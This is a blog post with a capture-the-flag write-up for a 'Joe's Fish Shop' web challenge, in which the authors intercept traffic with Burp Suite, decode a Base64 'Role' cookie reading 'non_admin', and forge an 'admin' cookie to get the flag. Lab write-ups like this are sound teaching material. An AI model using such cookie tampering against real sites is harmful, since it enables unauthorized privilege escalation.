Go, get some tasty dinner over at Joe's Fish Shop! If you know how to play the admin, you'll get free desert! :)
Solution:
This is the first challenge we solved. We used Burp Suite Pro to intercept
all our traffic to/from the challenge web site. Loading the initial page
for challenge 12, we captured the following HTTP headers in the response:
HTTP/1.0 200 OK Date: Wed, 25 Jan 2012 13:06:49 GMT Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.9 with Suhosin-Patch X-Powered-By: PHP/5.3.9 Content-Length: 1659 Content-Type: text/html Set-Cookie: Role=bm9uX2FkbWlu Set-Cookie: ID=current_user Set-Cookie: _tmp=d0f0elfe Set-Cookie: access=none Connection: closeNotice the server is setting a cookie named
Role to an alphanumeric value.Base64 encoded data is also alphanumeric. We sent the value of the
Role cookie to the Decoder tab in BSP, selected Decode as Base64 and saw this:
non_adminThat's interesting. We used BSP's Decoder tab to Base64 encode the string
admin, and copied the result (YWRtaW4=) to the clipboard. We then reloaded the challenge page, caught the request in BSP's Intercept
tab, and changed the value of the
Role cookie to YWRtaW4=. The modified Cookie header looked like:Cookie: Role=YWRtaW4=; ID=current_user; _tmp=d0f0elfe; access=noneAfter forwarding the modified request on to the server, we received the flag:
Welcome Administrator. Please take your flag: x0sld0ef0d
No comments:
Post a Comment